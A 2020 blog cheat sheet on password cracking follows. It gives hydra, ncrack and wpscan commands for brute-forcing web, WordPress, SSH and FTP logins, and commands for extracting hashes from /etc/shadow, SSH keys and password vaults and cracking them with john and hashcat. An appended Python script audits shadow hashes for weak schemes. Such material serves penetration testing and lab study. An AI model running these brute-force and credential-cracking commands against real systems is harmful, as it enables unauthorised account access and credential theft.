Information Technology | Softwares - Graphics - Programming - Hacking - Security

Apr 16, 2020

Crack Password Cheat Sheet | How to crack and brute force passwords


Cracking password protected PDF files
$ pdfcrack -f <pdf file> -w <wordlist>

Cracking Web-Application Passwords
Get Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-get <path to admin panel>
Post Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "<Login Page>:<Request Body with ^USER^ and ^PASS^>:<Error Message>"
e.g.: hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^:<Error Message>"

Wordpress:
$ wpscan --url <target ip/wp-login> -U <usernames list> -P <passwords list>

Cracking SSH Passwords
$ hydra -L <usernames list> -P <passwords list> 10.10.10.180 ssh
$ ncrack -U <usernames list> -P <passwords list> ssh://10.10.10.180

Cracking FTP Passwords
$ hydra -L <usernames list> -P <passwords list> 10.10.10.180 ftp
$ ncrack -U <usernames list> -P <passwords list> ftp://10.10.10.180

Cracking Passwords when Service uses non-standard port
$ hydra -L <usernames list> -P <passwords list> -s <port> 10.10.10.180 ssh
$ ncrack -U <usernames list> -P <passwords list> ssh://10.10.10.180:<port>


Identifying Hash Types: 
$ hashid <file containing hashes> 
$ hashid -m <file containing hashes> # Shows hashcat mode 
$ hashid -j <file containing hashes> # Shows john format 

Converting encrypted files into a format supported by John: 
$ unshadow <etc_passwd file> <etc_shadow_file> > unshadowed.file 
$ ssh2john.py <encrypted SSH key file> > SSHkey.john 
$ keepass2john <kdb file> > keepass_hash.john 
$ rar2john <encrypted rar file> > rarfilehash.john
$ 7z2john <encrypted 7z file> > 7zfilehash.john

Cracking Hashes Using John The Ripper: 
$ john --list=formats # outputs all supported formats
$ john <hash file> --wordlist=<path to wordlist>
$ john <hash file> --show # shows cracked hashes
$ john <hash file> --wordlist=<path to wordlist> --format=<hash format>
$ john <hash file> --incremental # uses ASCII incremental mode
$ john <hash file> --incremental=digits # uses digit incremental mode: 0 to 99999999999999999999



Cracking Hashes Using HashCat:
$ hashcat -m <hash type mode> -a <attack mode> <hash file> <path to wordlist> 

HashCat Attack Modes (-a):
0 : Straight 
1 : Combination 
3 : Brute-force 

HashCat Hash Types (-m): 
Linux OS Hashes:
500 : MD5 ($1$)
3200 : Blowfish ($2$)
7400 : SHA256 ($5$)
1800 : SHA512 ($6$)

Windows OS Hashes:
1000 : NTLM 
3000 : LM 

MacOS Hashes:
122 : MacOS v10.4,10.5,10.6 
1722 : MacOS v10.7 
7100 : MacOS v10.8+ 

Application hashes 
900 : MD4 
0 : MD5 
100 : SHA1
1400 : SHA2-256 
1700 : SHA2-512 
17400 : SHA3-256 
17600 : SHA3-512 

Network Protocol Hashes: 
7500 : Kerberos 5 
10200 : CRAM-MD5 
11100 : PostgreSQL CRAM (MD5)
11200 : MySQL CRAM (SHA1)
16500 : JSON Web Token

Salted Hashes:
10 : MD5 ($pass.$salt)
20 : MD5 ($salt.$pass) 
110 : SHA1 ($pass.$salt)
1410 : SHA256 ($pass.$salt)
1420 : SHA256 ($salt.$pass)
1710 : SHA512 ($pass.$salt) 
1720 : SHA512 ($salt.$pass) 
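
The $1$ / $2$ / $5$ / $6$ prefixes in the Linux OS Hashes table are also what a defender reads when auditing which schemes a host still stores. The script below is an added example, not from the original page: it classifies the password field of shadow or unshadowed lines and flags md5crypt, low sha-crypt round counts and empty passwords. The function names, the 5000-round floor and the sample lines are assumptions constructed for illustration.

```python
import re

# crypt(3) id -> (scheme, hashcat -m value from the table above, treated as weak?)
SCHEMES = {"1": ("md5crypt", 500, True), "2": ("bcrypt", 3200, False),
           "5": ("sha256crypt", 7400, False), "6": ("sha512crypt", 1800, False)}
MIN_ROUNDS = 5000  # assumption: the sha-crypt default is used as the floor

def classify(field):
    """Return (scheme, hashcat_mode, finding) for one shadow password field."""
    if field == "":
        return ("none", None, "empty password")
    if field[0] in "!*":
        return ("locked", None, None)  # locked or no-login account
    m = re.match(r"\$(\w+)\$(?:rounds=(\d+)\$)?", field)
    if not m:
        return ("legacy/unknown", None, "no $id$ prefix (DES crypt or unknown)")
    ident, rounds = m.groups()
    key = "2" if ident.startswith("2") else ident  # $2a$, $2b$, $2y$ are bcrypt
    if key not in SCHEMES:
        return ("$%s$" % ident, None, "scheme not in the table above")
    name, mode, weak = SCHEMES[key]
    if weak:
        return (name, mode, "weak scheme")
    if rounds is not None and int(rounds) < MIN_ROUNDS:
        return (name, mode, "rounds=%s below %d" % (rounds, MIN_ROUNDS))
    return (name, mode, None)

def audit(shadow_text):
    """Classify every user:password:... line of shadow or unshadowed text."""
    rows = []
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 2 and not line.startswith("#"):
            rows.append((parts[0],) + classify(parts[1]))
    return rows

# Constructed sample input; salts and hash bodies are placeholders.
SAMPLE = """\
root:$6$rounds=1000$SALT$HASHPLACEHOLDER:18000:0:99999:7:::
alice:$1$SALT$HASHPLACEHOLDER:18000:0:99999:7:::
bob:$2b$12$SALTANDHASHPLACEHOLDER:18000:0:99999:7:::
carol:$y$j9T$SALT$HASHPLACEHOLDER:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
guest::18000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, scheme, mode, finding in audit(SAMPLE):
        print(f"{user:8} {scheme:16} -m {mode!s:5} {finding or 'ok'}")
```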